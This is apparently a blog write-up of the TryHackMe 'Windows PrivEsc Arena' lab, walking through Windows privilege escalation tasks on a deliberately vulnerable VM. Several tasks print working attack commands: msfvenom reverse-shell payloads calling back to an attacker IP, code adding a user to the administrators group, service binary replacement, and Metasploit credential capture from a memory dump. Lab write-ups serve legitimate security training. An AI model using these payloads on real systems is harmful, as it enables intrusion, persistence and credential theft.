Home Windows PrivEsc Arena
Post
Cancel

Windows PrivEsc Arena

Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. Your credentials are user:password321

THM Room https://tryhackme.com/room/windowsprivescarena

TASK 1 : Connecting to TryHackMe network

I’ve read the intro and deployed the attached virtual machine.

No Answer

TASK 2 : Deploy the vulnerable machine

Deploy the machine and log into the user account via RDP

No Answer

Open a command prompt and run ‘net user’. Who is the other non-default user on the machine?

User User

Answer : TCM

TASK 3 : Registry Escalation - Autorun

Click ‘Completed’ once you have successfully elevated the machine

First, i looked at autoruns64.exe for “program.exe”, then i checked with accesschk that the group “Everyone” has the “FILE_ALL_ACCESS” permission :

Permission Permission

After building a program.exe reverse with msfvenom on the attacker machine :

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.135.148 -f exe -o program.exe

I uploaded this in the “C:\Program Files\Autorun Program” directory. (Via python3 HTTP server on attacker)

Then launched a handler in Metasploit and relogged to an admin session to simulate an adminsitrator connexion :

Meterpreter Meterpreter

I got an active meterpreter session. Let’s checked ithe user groups :

Groups Groups

No Answer.

TASK 4 : Registry Escalation - AlwaysInstallElevated

Click ‘Completed’ once you have successfully elevated the machine

First, looking the registry key is well set to 1 :

AlwaysInstallElevated Registry Key AlwaysInstallElevated Registry Key

Then creating a msi reverse shell installer with msfvenom :

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.199.49 lport=4545 -f msi -o setup.msi

With a simle HTTP python Server , i downloaded the file on the target then ran the command :

Download Malicious File Download Malicious File

In the Metasploit listener previously launched, i receive a shell with system rights :

Reverse shell Reverse shell

No Answer.

TASK 5 : Service Escalation - Registry

Click ‘Completed’ once you have successfully elevated the machine

Permissions Permissions

Compiled the c code with the changes to the system function into x.exe :

1
2
3
4
5
6
7
8
9
[...]
//add the payload here
int Run() 
{ 
    //system("whoami > c:\\windows\\temp\\service.txt");
    system("cmd.exe /k net localgroup administrators user /add");
    return 0; 
} 
[...]

x.exe x.exe

Then adding x.exe on target and launching the service :

Whoami Whoami

We can see that our local user has been added to the local administrators group.

No Answer.

TASK 6 : Service Escalation - Executable Files

Click ‘Completed’ once you have successfully elevated the machine

Detection of vulnerability :

Detection Detection

The filepermservice.exe file has “FILE_ALL_ACCESS” permission for Everyone set.

Exploitation : Using the x.exe file used previously, and copied it to filepermservice.exe to replace it.

1
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

Then starting the service :

1
 sc start filepermsvc

We now have the user added to the local administrators group :

Verification Verification

No Answer

TASK 7 : Privilege Escalation - Startup Applications

Click ‘Completed’ once you have successfully elevated the machine

New payload generated :

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.199.49 LPORT=53 -f exe -o x.exe

Detection :

Verification Verification

Users has F (full access) persmission on the Startup folder as intended.

Exploitation :

Let’s download our new exe file to this folder.

y.exe y.exe

Then when logged to an admin user, i received a privileges shell :

Verification Verification

No Answer

TASK 8 : Service Escalation - DLL Hijacking

Click ‘Completed’ once you have successfully elevated the machine

First, i created the modified dll from the given file :

windows_dll.c windows_dll.c

Then restarted the dllsvc service :

Service Restart Service Restart

No Answer.

TASK 9 : Service Escalation - binPath

Click ‘Completed’ once you have successfully elevated the machine

First, checked that the user has the “SERVICE_CHANGE_CONFIG” permission set :

Permissions Permissions

Then adding our user to local admin group :

Local admin group Local admin group

No Answer

TASK 10 : Service Escalation - Unquoted Service Paths

Click ‘Completed’ once you have successfully elevated the machine

Checking i can exploit an unquoted path :

unquoted path unquoted path

Built a exe file adding user to local admin group :

common.exe common.exe

Launching the exploit :

Exploit Exploit

No Answer

TASK 11 : Potato Escalation - Hot Potato

Click ‘Completed’ once you have successfully elevated the machine

“Hot potato is the code name of a Windows privilege escalation technique that was discovered by Stephen Breen. This technique is actually a combination of two known windows issues like NBNS spoofing and NTLM relay with the implementation of a fake WPAD proxy server which is running locally on the target host.” _pentesterlab.blog https://pentestlab.blog/2017/04/13/hot-potato/

Executing the provide script for Hot Potato exploit :

Exploit Exploit

It added our user to the local adminsitrator group.

No Answer.

TASK 12 : Password Mining Escalation - Configuration Files

What is the cleartext password found in Unattend.xml?

Unexpected password found in xml configuration file :

Configuration File Configuration File

It’s base64 encode, so i need to decode it :

Decoded Password Decoded Password

Answer : password123

TASK 13 : Password Mining Escalation - Memory

Click ‘Completed’ once you have successfully found all the passwords

Started msfconsole and used following commands :

1
2
3
4
use auxiliary/server/capture/http_basic
set uripath x
set SRVPORT 8888
run

Then i explored on the windows target http://10.10.199.49:8888/x and got an error while connecting. So, i created a dump file from the internet explorer via the Taskmanager :

Dump Dump

Dumping process Dumping process

Dumping process 2 Dumping process 2

Next i ran a smb server on kali :

1
sudo python3 /opt/impackets/examples/smbserver.py kali .

so i could transfert the dump files from Windows to the Kali machine :

Transfer dump Transfer dump

The command strings didn’t return anything :

1
strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"

But in the Metasploit capture, i got the password captured :

EXploit EXploit

No Answer

TASK 14 : Privilege Escalation - Kernel Exploits

Click ‘Completed’ once you have successfully elevated the machine

The msfvenom payload kept crashing for me, event changing settings like encoder or architecture.

When the reverse shell was established, it instantly died.

No Answer

This post is licensed under CC BY 4.0 by the author.